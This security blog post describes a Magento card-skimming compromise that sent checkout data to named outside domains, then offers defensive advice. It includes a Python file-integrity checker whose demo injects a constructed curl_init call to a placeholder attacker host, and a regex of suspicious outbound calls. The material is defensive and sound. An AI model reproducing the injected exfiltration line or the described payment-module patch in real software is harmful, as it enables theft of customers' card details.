Recently we wrote about the impacts of a hacked website and how it is important to give website visitors a safe online experience. In this post, I’ll show you how a hacked website results in almost immediate loss of money.
We’re not talking about drive-by infections that can be prevented by using a good antivirus, updated software, and extensions like NoScript. We’re also not talking about phishing pages, where you can recognize the scam and choose not to enter your credentials on a fake website. This time, we’re talking about using legitimate sites that have absolutely no externally visible signs of compromise.
Stolen Credit Card Details
One of our clients who owns an ecommerce site asked us to investigate why he was getting complaints from customers about unauthorized credit card transactions:
We received 2 messages from customers today indicating that after making a purchase on our site, they were hit with multiple fraudulent charges on their credit card.
We scanned their Magento site and found malicious code inside the app/code/core/Mage/Payment/Model/Method/Cc.php file:
Inside the prepareSave() function, hackers added 50 extra lines of code that were designed to send all the information submitted by a customer during the checkout process to a third-party site: “soulmagic .biz .fozzyhost .com/add“.
As with most Magento sites, this site had a checkout form that requests customers’ credit card details. Behind the scenes, Magento encrypts this data and saves it or sends it to a payment gateway to complete the transaction. We won’t discuss how secure this practice is. Instead, we’ll focus on the moment between the checkout form submission and encryption of the payment details. This is a very short period of time when Magento handles sensitive customer information in an unencrypted format. This is all fine – unless the site is compromised and hackers patched the code that works with the unencrypted information.
A quick search revealed that other Magento sites had also been hit by this attack, with the earliest known incidents going back to December of 2013. Back then, the thieves used the “java-e-shop .com/add” URL to dump stolen payment details. We also found very similar code that sends credit card information to java-e-shop .com injected into the components/com_jdonation/payments/os_authnet.php file of the Joomla Donation extension on Joomla sites.
Both these sites are hosted on the Webazilla/Fozzy.com network:
- soulmagic .biz .fozzyhost .com – 126.96.36.199 – Cyprus, Limassol – Webazilla B.V.
- java-e-shop .com – 188.8.131.52 – United States, Wilmington – Webazilla B.V.
Magento and JoomDonation are not the only web applications targeted by credit card thieves. All ecommerce solutions (CMS, plugin, extension, etc.) are equally susceptible to this kind of attack if they allow customers to enter their credit card details directly on the site (instead of redirecting them to a payment gateway site to complete the transaction). It is easy for attackers to add a little patch to the legitimate code that dumps customer details to a malicious third party.
Customers of online stores are not the only target either. When hackers manage to compromise an ecommerce site, the owners of the website can be robbed too. We have seen cases where hackers replace the website owner’s PayPal account in the site payment module with their own account. When customers would buy something, the website owner would never receive the funds.
To Online Shoppers
These kinds of hacks make using ecommerce websites quite risky. You can never tell whether it is really secure to enter your credit card details on a site or not.
Security badges and HTTPS with a trusted certificate provide no guarantee that the payment module has not been “patched”, and external scans simply can’t detect this. HTTPS encrypts traffic only between your browser and the site’s server; once the site receives your data, the site’s own code handles it unencrypted. You may only find out that the site was not secure after you have paid, when fraudulent charges appear on your card statement. Again, this doesn’t happen immediately. It may take hours, days, or even months before the criminals decide to use your stolen credit card details, and if you use that card often, it is hard to tell which online store leaked your data, or whether it was leaked through online shopping at all.
You can still minimize risk when shopping online:
- Shy away from sites that require you to enter payment details on their own pages. Instead, prefer websites that send you to a payment organization (PayPal, a payment gateway, your bank, etc.) to complete the purchase. These payment organizations are required to have very strict security policies for their websites, with regular assessments, so they are less likely to be hacked or to miss unauthorized modifications in their backend code.
- Check if the website has or recently had some security issue. If hackers have already broken into that site previously, they could have patched the payment module. The modification might be overlooked and survive a cleanup.
- You may find such information if you scan a site with our free SiteCheck tool. It searches for malware and checks sites against 10 different blacklists.
- You can also check Google’s SafeBrowsing information for the site: http://www.google.com/safebrowsing/diagnostic?site=example.com (replace example.com with the domain name of the site). The diagnostic pages contain historical information for the last 90 days.
- You can also search the internet to see whether the website had any security issues recently. Use the domain name along with keywords like “security”, “hacked”, “malware”, “fraud”, etc.
- Only use credit cards with additional levels of authentication. E.g. Visa 3-D Secure, or MasterCard SecureCode, or your bank’s own 2FA service. Of course, this is not bulletproof protection as hackers may use the credit card details in places that don’t support these additional security layers (think most offline transactions).
To Owners of Ecommerce Sites
Adapting a well-known quote:
With websites comes responsibility. With ecommerce websites comes great responsibility.
Let’s check what the official payment card industry has to say about this:
Small merchants are prime targets for data thieves. It’s your job to protect cardholder data at the point of sale.
If cardholder data is stolen – and it’s your fault – you could incur fines, penalties, even termination of the right to accept payment cards!
You can find more information about it in our series of blog posts about PCI compliance and e-commerce sites.
Here are some basic suggestions for small ecommerce sites:
- Stay away from processing payment details on your site. If your site never has access to clients’ payment details, it can’t be used to steal them even if it is hacked. Just outsource payments to a trusted third-party service such as PayPal, Stripe, Google Wallet, Authorize.net, etc.
- Think security from the very beginning. You need to be proactive. If your site is hacked then you need to get help quickly. You can’t risk your customers’ money and your reputation.
- Use best practices with your website security:
  - Use strong and unique passwords for every element of your site: hosting, CMS, payment services, etc.
  - Have some integrity control of files and the database. This will help you detect unauthorized modifications. Our WordPress security plugin offers integrity monitoring.
  - Don’t host your e-commerce site on the same hosting account as other sites. The better the isolation from the other sites, the fewer chances that one of the less secure neighbor sites becomes the point of penetration for your important ecommerce site.
  - Use a website firewall: it will protect your site from many web-based attacks. Ideally, the firewall should be actively maintained and updated so that new types of attacks can’t bypass it.
  - Monitor your website for security issues, both on the client-facing frontend and the server-side backend.
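As an added illustration of the integrity-control and monitoring advice above (example code written for this edit, not Sucuri’s plugin, Magento’s code, or the attackers’ patch): a small Python baseline-and-verify tool. It hashes the PHP and XML files of a store, keeps the hashes as a baseline, and on a later run reports added, removed and modified files; every added or modified PHP file is additionally scanned for outbound-call functions (curl_init, fsockopen, mail, file_get_contents on a URL), which is a heuristic that narrows review, not proof of compromise. The directory tree, the file contents and the attacker.invalid hostname are constructed for the demo; the Cc.php path from the post is used only as a file name.

```python
import hashlib
import json
import re
import tempfile
from pathlib import Path

# Constructed stand-in for a Magento tree. The PHP bodies are placeholders,
# not Magento's real source.
CLEAN_TREE = {
    "app/code/core/Mage/Payment/Model/Method/Cc.php":
        "<?php\nclass Mage_Payment_Model_Method_Cc {\n"
        "  public function prepareSave() { return $this; }\n}\n",
    "app/etc/local.xml": "<config><!-- constructed sample --></config>\n",
}

# Functions a core payment model rarely needs but an injected exfiltration
# patch almost always does. Heuristic only: a hit means "review this file".
SUSPICIOUS_CALLS = re.compile(
    r"\b(?:curl_init|curl_exec|fsockopen|stream_socket_client|mail)\s*\("
    r"|\bfile_get_contents\s*\(\s*['\"]https?://",
    re.IGNORECASE,
)


def sha256_of(path: Path) -> str:
    """Stream the file so large archives do not have to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path, suffixes=(".php", ".phtml", ".xml")) -> dict:
    """Map root-relative path -> sha256 for every file of interest under root."""
    baseline = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix in suffixes:
            baseline[path.relative_to(root).as_posix()] = sha256_of(path)
    return baseline


def check_integrity(root: Path, baseline: dict) -> dict:
    """Diff the live tree against a baseline and flag changed PHP files that
    now contain outbound-call functions."""
    current = build_baseline(root)
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in current.keys() & baseline.keys()
                      if current[p] != baseline[p])
    flagged = {}
    for rel in added + modified:
        if rel.endswith((".php", ".phtml")):
            text = (root / rel).read_text(errors="replace")
            hits = sorted({m.group(0).split("(")[0].strip()
                           for m in SUSPICIOUS_CALLS.finditer(text)})
            if hits:
                flagged[rel] = hits
    return {"added": added, "removed": removed,
            "modified": modified, "flagged": flagged}


def demo() -> dict:
    """Write the clean tree, take a baseline, simulate an unauthorized change
    to the payment model plus a harmless new config file, then verify."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for rel, body in CLEAN_TREE.items():
            target = root / rel
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body)
        baseline = build_baseline(root)  # in practice: store this off-server

        # Constructed tampering: the only point is that the payment model
        # changed and now opens an outbound HTTP connection (placeholder host).
        cc = root / "app/code/core/Mage/Payment/Model/Method/Cc.php"
        cc.write_text(cc.read_text()
                      + "$ch = curl_init('http://attacker.invalid/add');\n")
        (root / "app/etc/extra.xml").write_text("<config/>\n")  # benign add

        return check_integrity(root, baseline)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Keep the baseline outside the web root (ideally on another host, or signed), because an attacker who can edit Cc.php can just as easily rewrite a baseline stored beside it, and re-take it only after you have reviewed and approved every change the verify run reports.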
Update: Read our new PCI Compliance guide.